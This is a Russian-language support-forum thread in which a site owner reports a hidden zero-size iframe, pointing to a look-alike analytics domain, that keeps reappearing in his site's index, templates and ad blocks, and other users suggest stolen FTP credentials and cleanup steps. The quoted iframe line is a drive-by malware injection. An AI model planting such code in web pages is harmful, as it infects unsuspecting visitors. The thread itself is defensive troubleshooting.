Помогите! Заколебали вирусы!

[garnir 1]

Наткнулся у сябя в индексе на левый код, который я туда не вписывал.

<iframe src="http://google-analistyc.net/in.cgi?8" width="0" height="0" style="display:none"></iframe>

Поискал в нете инфу что это за фигна - оказалось что эта муть грузит вирусы на комп пользователя, зашедшего на сайт.

Вычистил код, сменил права на индекс (поставл всем только чтение), на следующий день опять такая-же фигня.

Подскажите как от этого избавиться?

Сайт - xxxrips.ru

[celsoft 6241]

А причем здесь права на файл, взламывают ваш сайт по FTP, поэтому никакая смена прав на файл вам не поможет. Используйте поиск на форуме по слову iframe, эта тема неоднократно обсуждалась, там же и найдете пути для решения вопроса.

[leoxe 0]

Наткнулся у сябя в индексе на левый код, который я туда не вписывал.

<iframe src="http://google-analistyc.net/in.cgi?8" width="0" height="0" style="display:none"></iframe>

Поискал в нете инфу что это за фигна - оказалось что эта муть грузит вирусы на комп пользователя, зашедшего на сайт.

Вычистил код, сменил права на индекс (поставл всем только чтение), на следующий день опять такая-же фигня.

Подскажите как от этого избавиться?

Сайт - xxxrips.ru

такая же проблема была, на днях, только код другой, но это не лавное...

проверяешь винду антивирусом (а лучше переустанавливаешь), меняешь пароли на все! в т.ч. фтп, к панели хостера и т.п.

и будет тебе счастье...

[serega7777777 0]

Поискал в нете инфу что это за фигна - оказалось что эта муть грузит вирусы на комп пользователя, зашедшего на сайт.

Вычистил код, сменил права на индекс (поставл всем только чтение), на следующий день опять такая-же фигня.

Подскажите как от этого избавиться?

Сайт - xxxrips.ru

Уважаемый Виктор, почему вам не забанить этого подлеца с его порнушным сайтом и с трояном ?

[garnir 1]

Какой у меня сайт - это мое личное дело. Не нравится - не ходите. Речь идет о движке и вирусе, который, между прочим, достал уже всех.

Я снес винду на своем компе, поставил вместо нее Debian Linux, поменял ВСЕ пароли, ftp, админка, свой пароль входа на сайт и всеравно ничего не помогает. Этот код продолжает появляться.

[Demon2 0]

А может движок нуленый с сюрпризом?

[garnir 1]

Вот это не надо на меня вешать. Движок я покупал. И в отличии от засранцев, которые юзают нуленые движки я имею право хоть на какую-то поддержку, хотя-бы на форуме.

PS Только дебил станет обращаться на официальный форум поддержки с пиратской версией скрипта.

[celsoft 6241]

garnir,

Всем чем я мог, я вам помог, я объяснил вам, что не в скрипте не проблема, взламывают вас не через скрипт. У вас утекают ваши логины и пароли, причем не от скрипта, а выше, т.к. изменить через web index.php нельзя, на файл нет прав на запись. Меняют по FTP или SSH, или с панели управления хостингом. Возможно уязвимо ПО хостинга, такие случаи также были не раз.

[garnir 1]

Сегодня обнаружил новую штуку. Перестал появляться айфрейм в шаблоне main и в index, но код появляется в коротких новостях, причем не во всех. Где теперь его искать - ума не приложу. Пересмотрел все шаблоны. Ничего не нашел.

!!!! Во дела! Нашел код в рекламных материалах!

[Zdraff 4]

Блин.

1. убедись, что ОСь у тебя здоровая на компе.

2. убедись, что хостер следит за чистотой сервера.

3. скачай шароварный фтп-клиент и не крякай его (или купи лицензию).

4. поменяй пасс на фтп.

5. юзай и анализируй.

[Rudnizki 0]

Стукни в асю, постараюсь помоч